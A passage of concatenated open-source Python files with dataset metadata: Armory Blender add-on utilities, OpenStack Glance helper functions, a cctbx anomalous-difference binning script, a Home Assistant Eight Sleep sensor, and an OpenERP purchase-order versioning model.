prop.value = defaults[i]
if found:
prop = item.arm_traitpropslist[found.name]
f = found.name.replace(')', '').split('(')
# Default value added and current value is blank (no override)
if (not found.value and defaults[i]):
prop.value = defaults[i]
# Type has changed, update displayed name
if (len(f) == 1 or (len(f) > 1 and f[1] != p[1])):
prop.name = p[0] + ('(' + p[1] + ')' if p[1] else '')
def fetch_bundled_trait_props():
# Bundled script props
for o in bpy.data.objects:
for t in o.arm_traitlist:
if t.type_prop == 'Bundled Script':
file_path = get_sdk_path() + '/armory/Sources/armory/trait/' + t.name + '.hx'
if os.path.exists(file_path):
fetch_script_props(file_path)
fetch_prop(o)
def update_trait_collections():
for col in bpy.data.collections:
if col.name.startswith('Trait|'):
bpy.data.collections.remove(col)
for o in bpy.data.objects:
for t in o.arm_traitlist:
if 'Trait|' + t.name not in bpy.data.collections:
col = bpy.data.collections.new('Trait|' + t.name)
else:
col = bpy.data.collections['Trait|' + t.name]
col.objects.link(o)
def to_hex(val):
return '#%02x%02x%02x%02x' % (int(val[3] * 255), int(val[0] * 255), int(val[1] * 255), int(val[2] * 255))
def color_to_int(val):
return (int(val[3] * 255) << 24) + (int(val[0] * 255) << 16) + (int(val[1] * 255) << 8) + int(val[2] * 255)
def safesrc(s):
s = safestr(s).replace('.', '_').replace('-', '_').replace(' ', '')
if s[0].isdigit():
s = '_' + s
return s
def safestr(s):
for c in r'[]/\;,><&*:%=+@!#^()|?^':
s = s.replace(c, '_')
return ''.join([i if ord(i) < 128 else '_' for i in s])
def asset_name(bdata):
s = bdata.name
# Append library name if linked
if bdata.library != None:
s += '_' + bdata.library.name
return s
def asset_path(s):
return s[2:] if s[:2] == '//' else s # Remove leading '//'
def extract_filename(s):
return os.path.basename(asset_path(s))
def get_render_resolution(scene):
render = scene.render
scale = render.resolution_percentage / 100
return int(render.resolution_x * scale), int(render.resolution_y * scale)
def get_project_scene_name():
return get_active_scene().name
def get_active_scene():
if not state.is_export:
return bpy.context.scene
else:
wrd = bpy.data.worlds['Arm']
item = wrd.arm_exporterlist[wrd.arm_exporterlist_index]
return item.arm_project_scene
def logic_editor_space(context_screen=None):
if context_screen == None:
context_screen = bpy.context.screen
if context_screen != None:
areas = context_screen.areas
for area in areas:
for space in area.spaces:
if space.type == 'NODE_EDITOR':
if space.node_tree != None and space.node_tree.bl_idname == 'ArmLogicTreeType':
return space
return None
def voxel_support():
# macos does not support opengl 4.5, needs metal
return state.target != 'html5' and get_os() != 'mac'
def get_cascade_size(rpdat):
cascade_size = int(rpdat.rp_shadowmap_cascade)
# Clamp to 4096 per cascade
if int(rpdat.rp_shadowmap_cascades) > 1 and cascade_size > 4096:
cascade_size = 4096
return cascade_size
def check_saved(self):
if bpy.data.filepath == "":
msg = "Save blend file first"
self.report({"ERROR"}, msg) if self != None else log.print_info(msg)
return False
return True
def check_path(s):
for c in r'[];><&*%=+@!#^()|?^':
if c in s:
return False
for c in s:
if ord(c) > 127:
return False
return True
def check_sdkpath(self):
s = get_sdk_path()
if check_path(s) == False:
msg = "SDK path '{0}' contains special characters. Please move SDK to different path for now.".format(s)
self.report({"ERROR"}, msg) if self != None else log.print_info(msg)
return False
else:
return True
def check_projectpath(self):
s = get_fp()
if check_path(s) == False:
msg = "Project path '{0}' contains special characters, build process may fail.".format(s)
self.report({"ERROR"}, msg) if self != None else log.print_info(msg)
return False
else:
return True
def disp_enabled(target):
rpdat = get_rp()
if rpdat.arm_rp_displacement == 'Tessellation':
return target == 'krom' or target == 'native'
return rpdat.arm_rp_displacement != 'Off'
def is_object_animation_enabled(bobject):
# Checks if animation is present and enabled
if bobject.arm_animation_enabled == False or bobject.type == 'BONE' or bobject.type == 'ARMATURE':
return False
if bobject.animation_data and bobject.animation_data.action:
return True
return False
def is_bone_animation_enabled(bobject):
# Checks if animation is present and enabled for parented armature
if bobject.parent and bobject.parent.type == 'ARMATURE':
if bobject.parent.arm_animation_enabled == False:
return False
# Check for present actions
adata = bobject.parent.animation_data
has_actions = adata != None and adata.action != None
if not has_actions and adata != None:
if hasattr(adata, 'nla_tracks') and adata.nla_tracks != None:
for track in adata.nla_tracks:
if track.strips == None:
continue
for strip in track.strips:
if strip.action == None:
continue
has_actions = True
break
if has_actions:
break
if adata != None and has_actions:
return True
return False
def export_bone_data(bobject):
return bobject.find_armature() and is_bone_animation_enabled(bobject) and get_rp().arm_skin == 'On'
def kode_studio_mklink_win(sdk_path, ide_path):
# Fight long-path issues on Windows
if not os.path.exists(ide_path + '/resources/app/kodeExtensions/kha/Kha'):
source = ide_path + '/resources/app/kodeExtensions/kha/Kha'
target = sdk_path + '/Kha'
subprocess.check_call('mklink /J "%s" "%s"' % (source, target), shell=True)
if not os.path.exists(ide_path + '/resources/app/kodeExtensions/krom/Krom'):
source = ide_path + '/resources/app/kodeExtensions/krom/Krom'
target = sdk_path + '/Krom'
subprocess.check_call('mklink /J "%s" "%s"' % (source, target), shell=True)
def kode_studio_mklink_linux(sdk_path, ide_path):
if not os.path.exists(ide_path + '/resources/app/kodeExtensions/kha/Kha'):
source = ide_path + '/resources/app/kodeExtensions/kha/Kha'
target = sdk_path + '/Kha'
subprocess.check_call('ln -s "%s" "%s"' % (target, source), shell=True)
if not os.path.exists(ide_path + '/resources/app/kodeExtensions/krom/Krom'):
source = ide_path + '/resources/app/kodeExtensions/krom/Krom'
target = sdk_path + '/Krom'
subprocess.check_call('ln -s "%s" "%s"' % (target, source), shell=True)
def kode_studio_mklink_mac(sdk_path, ide_path):
if not os.path.exists(ide_path + '/Contents/Resources/app/kodeExtensions/kha/Kha'):
source = ide_path + '/Contents/Resources/app/kodeExtensions/kha/Kha'
target = sdk_path + '/Kha'
subprocess.check_call('ln -fs "%s" "%s"' % (target, source), shell=True)
if not os.path.exists(ide_path + '/Contents/Resources/app/kodeExtensions/krom/Krom'):
source = ide_path + '/Contents/Resources/app/kodeExtensions/krom/Krom'
target = sdk_path + '/Krom'
subprocess.check_call('ln -fs "%s" "%s"' % (target, source), shell=True)
def get_kode_path():
p = get_ide_path()
if p == '':
if get_os() == 'win':
p = get_sdk_path() + '/win32'
elif get_os() == 'mac':
p = get_sdk_path() + '/KodeStudio.app'
else:
p = get_sdk_path() + '/linux64'
return p
def get_kode_bin():
p = get_kode_path()
if get_os() == 'win':
return p + '/Kode Studio.exe'
elif get_os() == 'mac':
return p + '/Contents/MacOS/Electron'
else:
return p + '/kodestudio'
def get_vscode_bin():
p = get_kode_path()
if get_os() == 'win':
return p + '/Code.exe'
elif get_os() == 'mac':
return p + '/Contents/MacOS/Electron'
else:
return p + '/code'
def kode_studio(hx_path=None):
project_path = arm.utils.get_fp()
kode_bin = get_kode_bin()
if not os.path.exists(kode_bin):
kode_bin = get_vscode_bin()
if os.path.exists(kode_bin) and get_code_editor() == 'kodestudio':
if arm.utils.get_os() == 'win':
# kode_studio_mklink_win(get_sdk_path(), get_kode_path())
args = [kode_bin, arm.utils.get_fp()]
if hx_path != None:
args.append(hx_path)
subprocess.Popen(args)
elif arm.utils.get_os() == 'mac':
# kode_studio_mklink_mac(get_sdk_path(), get_kode_path())
args = ['"' + kode_bin + '"' + ' "' + arm.utils.get_fp() + '"']
if hx_path != None:
args[0] += ' "' + hx_path + '"'
subprocess.Popen(args, shell=True)
else:
# kode_studio_mklink_linux(get_sdk_path(), get_kode_path())
args = [kode_bin, arm.utils.get_fp()]
if hx_path != None:
args.append(hx_path)
subprocess.Popen(args)
else:
fp = hx_path if hx_path != None else arm.utils.get_fp()
webbrowser.open('file://' + fp)
def def_strings_to_array(strdefs):
defs = strdefs.split('_')
defs = defs[1:]
defs = ['_' + d for d in defs] # Restore _
return defs
def get_kha_target(target_name): # TODO: remove
if target_name == 'macos-hl':
return 'osx-hl'
elif target_name.startswith('krom'): # krom-windows
return 'krom'
elif target_name == 'custom':
return ''
return target_name
def target_to_gapi(arm_project_target):
# TODO: align target names
if arm_project_target == 'krom':
return 'arm_gapi_' + arm.utils.get_os()
elif arm_project_target == 'krom-windows':
return 'arm_gapi_win'
elif arm_project_target == 'windows-hl':
return 'arm_gapi_win'
elif arm_project_target == 'krom-linux':
return 'arm_gapi_linux'
elif arm_project_target == 'linux-hl':
return 'arm_gapi_linux'
elif arm_project_target == 'krom-macos':
return 'arm_gapi_mac'
elif arm_project_target == 'macos-hl':
return 'arm_gapi_mac'
elif arm_project_target == 'android-native-hl':
return 'arm_gapi_android'
elif arm_project_target == 'ios-hl':
return 'arm_gapi_ios'
elif arm_project_target == 'node':
return 'arm_gapi_html5'
else: # html5, custom
return 'arm_gapi_' + arm_project_target
def check_default_props():
wrd = bpy.data.worlds['Arm']
if len(wrd.arm_rplist) == 0:
wrd.arm_rplist.add()
wrd.arm_rplist_index = 0
if wrd.arm_project_name == '':
# Take blend file name
wrd.arm_project_name = arm.utils.blend_name()
def register(local_sdk=False):
global use_local_sdk
use_local_sdk = local_sdk
def unregister():
pass
| lgpl-3.0 | 2,749,772,502,997,039,600 | 35.08 | 127 | 0.581137 | false | 3.396179 | false | false | false |
ozamiatin/glance | glance/common/utils.py | 1 | 26028 | # Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2014 SoftLayer Technologies, Inc.
# Copyright 2015 Mirantis, Inc
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
System-level utilities and helper functions.
"""
import errno
try:
from eventlet import sleep
except ImportError:
from time import sleep
from eventlet.green import socket
import functools
import os
import platform
import re
import subprocess
import sys
import uuid
from OpenSSL import crypto
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from oslo_utils import netutils
from oslo_utils import strutils
import six
from webob import exc
from glance.common import exception
from glance import i18n
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
_ = i18n._
_LE = i18n._LE
FEATURE_BLACKLIST = ['content-length', 'content-type', 'x-image-meta-size']
# Whitelist of v1 API headers of form x-image-meta-xxx
IMAGE_META_HEADERS = ['x-image-meta-location', 'x-image-meta-size',
'x-image-meta-is_public', 'x-image-meta-disk_format',
'x-image-meta-container_format', 'x-image-meta-name',
'x-image-meta-status', 'x-image-meta-copy_from',
'x-image-meta-uri', 'x-image-meta-checksum',
'x-image-meta-created_at', 'x-image-meta-updated_at',
'x-image-meta-deleted_at', 'x-image-meta-min_ram',
'x-image-meta-min_disk', 'x-image-meta-owner',
'x-image-meta-store', 'x-image-meta-id',
'x-image-meta-protected', 'x-image-meta-deleted',
'x-image-meta-virtual_size']
GLANCE_TEST_SOCKET_FD_STR = 'GLANCE_TEST_SOCKET_FD'
def chunkreadable(iter, chunk_size=65536):
"""
Wrap a readable iterator with a reader yielding chunks of
a preferred size, otherwise leave iterator unchanged.
:param iter: an iter which may also be readable
:param chunk_size: maximum size of chunk
"""
return chunkiter(iter, chunk_size) if hasattr(iter, 'read') else iter
def chunkiter(fp, chunk_size=65536):
"""
Return an iterator to a file-like obj which yields fixed size chunks
:param fp: a file-like object
:param chunk_size: maximum size of chunk
"""
while True:
chunk = fp.read(chunk_size)
if chunk:
yield chunk
else:
break
def cooperative_iter(iter):
"""
Return an iterator which schedules after each
iteration. This can prevent eventlet thread starvation.
:param iter: an iterator to wrap
"""
try:
for chunk in iter:
sleep(0)
yield chunk
except Exception as err:
with excutils.save_and_reraise_exception():
msg = _LE("Error: cooperative_iter exception %s") % err
LOG.error(msg)
def cooperative_read(fd):
"""
Wrap a file descriptor's read with a partial function which schedules
after each read. This can prevent eventlet thread starvation.
:param fd: a file descriptor to wrap
"""
def readfn(*args):
result = fd.read(*args)
sleep(0)
return result
return readfn
MAX_COOP_READER_BUFFER_SIZE = 134217728 # 128M seems like a sane buffer limit
class CooperativeReader(object):
"""
An eventlet thread friendly class for reading in image data.
When accessing data either through the iterator or the read method
we perform a sleep to allow a co-operative yield. When there is more than
one image being uploaded/downloaded this prevents eventlet thread
starvation, ie allows all threads to be scheduled periodically rather than
having the same thread be continuously active.
"""
def __init__(self, fd):
"""
:param fd: Underlying image file object
"""
self.fd = fd
self.iterator = None
# NOTE(markwash): if the underlying supports read(), overwrite the
# default iterator-based implementation with cooperative_read which
# is more straightforward
if hasattr(fd, 'read'):
self.read = cooperative_read(fd)
else:
self.iterator = None
self.buffer = ''
self.position = 0
def read(self, length=None):
"""Return the requested amount of bytes, fetching the next chunk of
the underlying iterator when needed.
This is replaced with cooperative_read in __init__ if the underlying
fd already supports read().
"""
if length is None:
if len(self.buffer) - self.position > 0:
# if no length specified but some data exists in buffer,
# return that data and clear the buffer
result = self.buffer[self.position:]
self.buffer = ''
self.position = 0
return str(result)
else:
# otherwise read the next chunk from the underlying iterator
# and return it as a whole. Reset the buffer, as subsequent
# calls may specify the length
try:
if self.iterator is None:
self.iterator = self.__iter__()
return self.iterator.next()
except StopIteration:
return ''
finally:
self.buffer = ''
self.position = 0
else:
result = bytearray()
while len(result) < length:
if self.position < len(self.buffer):
to_read = length - len(result)
chunk = self.buffer[self.position:self.position + to_read]
result.extend(chunk)
# This check is here to prevent potential OOM issues if
# this code is called with unreasonably high values of read
# size. Currently it is only called from the HTTP clients
# of Glance backend stores, which use httplib for data
# streaming, which has readsize hardcoded to 8K, so this
# check should never fire. Regardless it still worths to
# make the check, as the code may be reused somewhere else.
if len(result) >= MAX_COOP_READER_BUFFER_SIZE:
raise exception.LimitExceeded()
self.position += len(chunk)
else:
try:
if self.iterator is None:
self.iterator = self.__iter__()
self.buffer = self.iterator.next()
self.position = 0
except StopIteration:
self.buffer = ''
self.position = 0
return str(result)
return str(result)
def __iter__(self):
return cooperative_iter(self.fd.__iter__())
class LimitingReader(object):
"""
Reader designed to fail when reading image data past the configured
allowable amount.
"""
def __init__(self, data, limit):
"""
:param data: Underlying image data object
:param limit: maximum number of bytes the reader should allow
"""
self.data = data
self.limit = limit
self.bytes_read = 0
def __iter__(self):
for chunk in self.data:
self.bytes_read += len(chunk)
if self.bytes_read > self.limit:
raise exception.ImageSizeLimitExceeded()
else:
yield chunk
def read(self, i):
result = self.data.read(i)
self.bytes_read += len(result)
if self.bytes_read > self.limit:
raise exception.ImageSizeLimitExceeded()
return result
def image_meta_to_http_headers(image_meta):
"""
Returns a set of image metadata into a dict
of HTTP headers that can be fed to either a Webob
Request object or an httplib.HTTP(S)Connection object
:param image_meta: Mapping of image metadata
"""
headers = {}
for k, v in image_meta.items():
if v is not None:
if k == 'properties':
for pk, pv in v.items():
if pv is not None:
headers["x-image-meta-property-%s"
% pk.lower()] = six.text_type(pv)
else:
headers["x-image-meta-%s" % k.lower()] = six.text_type(v)
return headers
def get_image_meta_from_headers(response):
"""
Processes HTTP headers from a supplied response that
match the x-image-meta and x-image-meta-property and
returns a mapping of image metadata and properties
:param response: Response to process
"""
result = {}
properties = {}
if hasattr(response, 'getheaders'): # httplib.HTTPResponse
headers = response.getheaders()
else: # webob.Response
headers = response.headers.items()
for key, value in headers:
key = str(key.lower())
if key.startswith('x-image-meta-property-'):
field_name = key[len('x-image-meta-property-'):].replace('-', '_')
properties[field_name] = value or None
elif key.startswith('x-image-meta-'):
field_name = key[len('x-image-meta-'):].replace('-', '_')
if 'x-image-meta-' + field_name not in IMAGE_META_HEADERS:
msg = _("Bad header: %(header_name)s") % {'header_name': key}
raise exc.HTTPBadRequest(msg, content_type="text/plain")
result[field_name] = value or None
result['properties'] = properties
for key, nullable in [('size', False), ('min_disk', False),
('min_ram', False), ('virtual_size', True)]:
if key in result:
try:
result[key] = int(result[key])
except ValueError:
if nullable and result[key] == str(None):
result[key] = None
else:
extra = (_("Cannot convert image %(key)s '%(value)s' "
"to an integer.")
% {'key': key, 'value': result[key]})
raise exception.InvalidParameterValue(value=result[key],
param=key,
extra_msg=extra)
if result[key] < 0 and result[key] is not None:
extra = _('Cannot be a negative value.')
raise exception.InvalidParameterValue(value=result[key],
param=key,
extra_msg=extra)
for key in ('is_public', 'deleted', 'protected'):
if key in result:
result[key] = strutils.bool_from_string(result[key])
return result
def create_mashup_dict(image_meta):
"""
Returns a dictionary-like mashup of the image core properties
and the image custom properties from given image metadata.
:param image_meta: metadata of image with core and custom properties
"""
def get_items():
for key, value in six.iteritems(image_meta):
if isinstance(value, dict):
for subkey, subvalue in six.iteritems(
create_mashup_dict(value)):
if subkey not in image_meta:
yield subkey, subvalue
else:
yield key, value
return dict(get_items())
def safe_mkdirs(path):
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def safe_remove(path):
try:
os.remove(path)
except OSError as e:
if e.errno != errno.ENOENT:
raise
class PrettyTable(object):
"""Creates an ASCII art table for use in bin/glance
Example:
ID Name Size Hits
--- ----------------- ------------ -----
122 image 22 0
"""
def __init__(self):
self.columns = []
def add_column(self, width, label="", just='l'):
"""Add a column to the table
:param width: number of characters wide the column should be
:param label: column heading
:param just: justification for the column, 'l' for left,
'r' for right
"""
self.columns.append((width, label, just))
def make_header(self):
label_parts = []
break_parts = []
for width, label, _ in self.columns:
# NOTE(sirp): headers are always left justified
label_part = self._clip_and_justify(label, width, 'l')
label_parts.append(label_part)
break_part = '-' * width
break_parts.append(break_part)
label_line = ' '.join(label_parts)
break_line = ' '.join(break_parts)
return '\n'.join([label_line, break_line])
def make_row(self, *args):
row = args
row_parts = []
for data, (width, _, just) in zip(row, self.columns):
row_part = self._clip_and_justify(data, width, just)
row_parts.append(row_part)
row_line = ' '.join(row_parts)
return row_line
@staticmethod
def _clip_and_justify(data, width, just):
# clip field to column width
clipped_data = str(data)[:width]
if just == 'r':
# right justify
justified = clipped_data.rjust(width)
else:
# left justify
justified = clipped_data.ljust(width)
return justified
def get_terminal_size():
def _get_terminal_size_posix():
import fcntl
import struct
import termios
height_width = None
try:
height_width = struct.unpack('hh', fcntl.ioctl(sys.stderr.fileno(),
termios.TIOCGWINSZ,
struct.pack('HH', 0, 0)))
except Exception:
pass
if not height_width:
try:
p = subprocess.Popen(['stty', 'size'],
shell=False,
stdout=subprocess.PIPE,
stderr=open(os.devnull, 'w'))
result = p.communicate()
if p.returncode == 0:
return tuple(int(x) for x in result[0].split())
except Exception:
pass
return height_width
def _get_terminal_size_win32():
try:
from ctypes import create_string_buffer
from ctypes import windll
handle = windll.kernel32.GetStdHandle(-12)
csbi = create_string_buffer(22)
res = windll.kernel32.GetConsoleScreenBufferInfo(handle, csbi)
except Exception:
return None
if res:
import struct
unpack_tmp = struct.unpack("hhhhHhhhhhh", csbi.raw)
(bufx, bufy, curx, cury, wattr,
left, top, right, bottom, maxx, maxy) = unpack_tmp
height = bottom - top + 1
width = right - left + 1
return (height, width)
else:
return None
def _get_terminal_size_unknownOS():
raise NotImplementedError
func = {'posix': _get_terminal_size_posix,
'win32': _get_terminal_size_win32}
height_width = func.get(platform.os.name, _get_terminal_size_unknownOS)()
if height_width is None:
raise exception.Invalid()
for i in height_width:
if not isinstance(i, int) or i <= 0:
raise exception.Invalid()
return height_width[0], height_width[1]
def mutating(func):
"""Decorator to enforce read-only logic"""
@functools.wraps(func)
def wrapped(self, req, *args, **kwargs):
if req.context.read_only:
msg = "Read-only access"
LOG.debug(msg)
raise exc.HTTPForbidden(msg, request=req,
content_type="text/plain")
return func(self, req, *args, **kwargs)
return wrapped
def setup_remote_pydev_debug(host, port):
error_msg = _LE('Error setting up the debug environment. Verify that the'
' option pydev_worker_debug_host is pointing to a valid '
'hostname or IP on which a pydev server is listening on'
' the port indicated by pydev_worker_debug_port.')
try:
try:
from pydev import pydevd
except ImportError:
import pydevd
pydevd.settrace(host,
port=port,
stdoutToServer=True,
stderrToServer=True)
return True
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(error_msg)
def validate_key_cert(key_file, cert_file):
try:
error_key_name = "private key"
error_filename = key_file
with open(key_file, 'r') as keyfile:
key_str = keyfile.read()
key = crypto.load_privatekey(crypto.FILETYPE_PEM, key_str)
error_key_name = "certificate"
error_filename = cert_file
with open(cert_file, 'r') as certfile:
cert_str = certfile.read()
cert = crypto.load_certificate(crypto.FILETYPE_PEM, cert_str)
except IOError as ioe:
raise RuntimeError(_("There is a problem with your %(error_key_name)s "
"%(error_filename)s. Please verify it."
" Error: %(ioe)s") %
{'error_key_name': error_key_name,
'error_filename': error_filename,
'ioe': ioe})
except crypto.Error as ce:
raise RuntimeError(_("There is a problem with your %(error_key_name)s "
"%(error_filename)s. Please verify it. OpenSSL"
" error: %(ce)s") %
{'error_key_name': error_key_name,
'error_filename': error_filename,
'ce': ce})
try:
data = str(uuid.uuid4())
digest = CONF.digest_algorithm
if digest == 'sha1':
LOG.warn('The FIPS (FEDERAL INFORMATION PROCESSING STANDARDS)'
' state that the SHA-1 is not suitable for'
' general-purpose digital signature applications (as'
' specified in FIPS 186-3) that require 112 bits of'
' security. The default value is sha1 in Kilo for a'
' smooth upgrade process, and it will be updated'
' with sha256 in next release(L).')
out = crypto.sign(key, data, digest)
crypto.verify(cert, out, data, digest)
except crypto.Error as ce:
raise RuntimeError(_("There is a problem with your key pair. "
"Please verify that cert %(cert_file)s and "
"key %(key_file)s belong together. OpenSSL "
"error %(ce)s") % {'cert_file': cert_file,
'key_file': key_file,
'ce': ce})
def get_test_suite_socket():
global GLANCE_TEST_SOCKET_FD_STR
if GLANCE_TEST_SOCKET_FD_STR in os.environ:
fd = int(os.environ[GLANCE_TEST_SOCKET_FD_STR])
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
if six.PY2:
sock = socket.SocketType(_sock=sock)
sock.listen(CONF.backlog)
del os.environ[GLANCE_TEST_SOCKET_FD_STR]
os.close(fd)
return sock
return None
def is_uuid_like(val):
"""Returns validation of a value as a UUID.
For our purposes, a UUID is a canonical form string:
aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa
"""
try:
return str(uuid.UUID(val)) == val
except (TypeError, ValueError, AttributeError):
return False
def is_valid_hostname(hostname):
"""Verify whether a hostname (not an FQDN) is valid."""
return re.match('^[a-zA-Z0-9-]+$', hostname) is not None
def is_valid_fqdn(fqdn):
"""Verify whether a host is a valid FQDN."""
return re.match('^[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$', fqdn) is not None
def parse_valid_host_port(host_port):
"""
Given a "host:port" string, attempts to parse it as intelligently as
possible to determine if it is valid. This includes IPv6 [host]:port form,
IPv4 ip:port form, and hostname:port or fqdn:port form.
Invalid inputs will raise a ValueError, while valid inputs will return
a (host, port) tuple where the port will always be of type int.
"""
try:
try:
host, port = netutils.parse_host_port(host_port)
except Exception:
raise ValueError(_('Host and port "%s" is not valid.') % host_port)
if not netutils.is_valid_port(port):
raise ValueError(_('Port "%s" is not valid.') % port)
# First check for valid IPv6 and IPv4 addresses, then a generic
# hostname. Failing those, if the host includes a period, then this
# should pass a very generic FQDN check. The FQDN check for letters at
# the tail end will weed out any hilariously absurd IPv4 addresses.
if not (netutils.is_valid_ipv6(host) or netutils.is_valid_ipv4(host) or
is_valid_hostname(host) or is_valid_fqdn(host)):
raise ValueError(_('Host "%s" is not valid.') % host)
except Exception as ex:
raise ValueError(_('%s '
'Please specify a host:port pair, where host is an '
'IPv4 address, IPv6 address, hostname, or FQDN. If '
'using an IPv6 address, enclose it in brackets '
'separately from the port (i.e., '
'"[fe80::a:b:c]:9876").') % ex)
return (host, int(port))
try:
REGEX_4BYTE_UNICODE = re.compile(u'[\U00010000-\U0010ffff]')
except re.error:
# UCS-2 build case
REGEX_4BYTE_UNICODE = re.compile(u'[\uD800-\uDBFF][\uDC00-\uDFFF]')
def no_4byte_params(f):
"""
Checks that no 4 byte unicode characters are allowed
in dicts' keys/values and string's parameters
"""
def wrapper(*args, **kwargs):
def _is_match(some_str):
return (isinstance(some_str, six.text_type) and
REGEX_4BYTE_UNICODE.findall(some_str) != [])
def _check_dict(data_dict):
# a dict of dicts has to be checked recursively
for key, value in six.iteritems(data_dict):
if isinstance(value, dict):
_check_dict(value)
else:
if _is_match(key):
msg = _("Property names can't contain 4 byte unicode.")
raise exception.Invalid(msg)
if _is_match(value):
msg = (_("%s can't contain 4 byte unicode characters.")
% key.title())
raise exception.Invalid(msg)
for data_dict in [arg for arg in args if isinstance(arg, dict)]:
_check_dict(data_dict)
# now check args for str values
for arg in args:
if _is_match(arg):
msg = _("Param values can't contain 4 byte unicode.")
raise exception.Invalid(msg)
# check kwargs as well, as params are passed as kwargs via
# registry calls
_check_dict(kwargs)
return f(*args, **kwargs)
return wrapper
def validate_mysql_int(*args, **kwargs):
"""
Make sure that all arguments are less than 2 ** 31 - 1.
This limitation is introduced because mysql stores INT in 4 bytes.
If the validation fails for some argument, exception.Invalid is raised with
appropriate information.
"""
max_int = (2 ** 31) - 1
for param in args:
if param > max_int:
msg = _("Value %(value)d out of range, "
"must not exceed %(max)d") % {"value": param,
"max": max_int}
raise exception.Invalid(msg)
for param_str in kwargs:
param = kwargs.get(param_str)
if param and param > max_int:
msg = _("'%(param)s' value out of range, "
"must not exceed %(max)d") % {"param": param_str,
"max": max_int}
raise exception.Invalid(msg)
def stash_conf_values():
"""
Make a copy of some of the current global CONF's settings.
Allows determining if any of these values have changed
when the config is reloaded.
"""
conf = {}
conf['bind_host'] = CONF.bind_host
conf['bind_port'] = CONF.bind_port
conf['tcp_keepidle'] = CONF.cert_file
conf['backlog'] = CONF.backlog
conf['key_file'] = CONF.key_file
conf['cert_file'] = CONF.cert_file
return conf
| apache-2.0 | 29,378,260,714,325,270 | 34.078167 | 79 | 0.552059 | false | 4.281625 | false | false | false |
keitaroyam/yamtbx | cctbx_progs/dano_vs_d.py | 1 | 1364 | """
Usage:
phenix.python dano_vs_d.py your.sca 20
"""
import iotbx.file_reader
from cctbx.array_family import flex
def run(hklin, n_bins):
for array in iotbx.file_reader.any_file(hklin).file_server.miller_arrays:
# skip if not anomalous intensity data
if not (array.is_xray_intensity_array() and array.anomalous_flag()):
print "skipping", array.info()
continue
# We assume that data is already merged
assert array.is_unique_set_under_symmetry()
# take anomalous differences
dano = array.anomalous_differences()
# process with binning
dano.setup_binner(n_bins=n_bins)
binner = dano.binner()
print "Array:", array.info()
print " dmax dmin nrefs dano"
for i_bin in binner.range_used():
# selection for this bin. sel is flex.bool object (list of True of False)
sel = binner.selection(i_bin)
# take mean of absolute value of anomalous differences in a bin
bin_mean = flex.mean(flex.abs(dano.select(sel).data()))
d_max, d_min = binner.bin_d_range(i_bin)
print "%7.2f %7.2f %6d %.2f" % (d_max, d_min, binner.count(i_bin), bin_mean)
# run()
if __name__ == "__main__":
import sys
hklin = sys.argv[1]
n_bins = int(sys.argv[2])
run(hklin, n_bins)
| bsd-3-clause | 3,833,057,630,944,875,500 | 31.47619 | 88 | 0.60044 | false | 3.135632 | false | false | false |
jamespcole/home-assistant | homeassistant/components/eight_sleep/binary_sensor.py | 1 | 1832 | """Support for Eight Sleep binary sensors."""
import logging
from homeassistant.components.binary_sensor import BinarySensorDevice
from . import CONF_BINARY_SENSORS, DATA_EIGHT, NAME_MAP, EightSleepHeatEntity
_LOGGER = logging.getLogger(__name__)
DEPENDENCIES = ['eight_sleep']
async def async_setup_platform(hass, config, async_add_entities,
discovery_info=None):
"""Set up the eight sleep binary sensor."""
if discovery_info is None:
return
name = 'Eight'
sensors = discovery_info[CONF_BINARY_SENSORS]
eight = hass.data[DATA_EIGHT]
all_sensors = []
for sensor in sensors:
all_sensors.append(EightHeatSensor(name, eight, sensor))
async_add_entities(all_sensors, True)
class EightHeatSensor(EightSleepHeatEntity, BinarySensorDevice):
"""Representation of a Eight Sleep heat-based sensor."""
def __init__(self, name, eight, sensor):
"""Initialize the sensor."""
super().__init__(eight)
self._sensor = sensor
self._mapped_name = NAME_MAP.get(self._sensor, self._sensor)
self._name = '{} {}'.format(name, self._mapped_name)
self._state = None
self._side = self._sensor.split('_')[0]
self._userid = self._eight.fetch_userid(self._side)
self._usrobj = self._eight.users[self._userid]
_LOGGER.debug("Presence Sensor: %s, Side: %s, User: %s",
self._sensor, self._side, self._userid)
@property
def name(self):
"""Return the name of the sensor, if any."""
return self._name
@property
def is_on(self):
"""Return true if the binary sensor is on."""
return self._state
async def async_update(self):
"""Retrieve latest state."""
self._state = self._usrobj.bed_presence
| apache-2.0 | -4,521,372,871,055,284,700 | 28.548387 | 77 | 0.622817 | false | 3.832636 | false | false | false |
iw3hxn/LibrERP | purchase_order_version/models/inherit_purchase_order_line.py | 1 | 2019 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2004-2014 Didotech srl (<http://www.didotech.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import orm, fields
class purchase_order_line(orm.Model):
_inherit = "purchase.order.line"
_columns = {
# 'active': fields.related('order_id', 'active', type='boolean', string='Active', store=False),
'purchase_line_copy_id': fields.many2one('purchase.order.line', 'Orig version', required=False, readonly=False),
}
def copy_data(self, cr, uid, line_id, defaults=None, context=None):
context = context or self.pool['res.users'].context_get(cr, uid)
defaults = defaults or {}
if context.get('versioning', False):
defaults['purchase_line_copy_id'] = line_id
return super(purchase_order_line, self).copy_data(cr, uid, line_id, defaults, context)
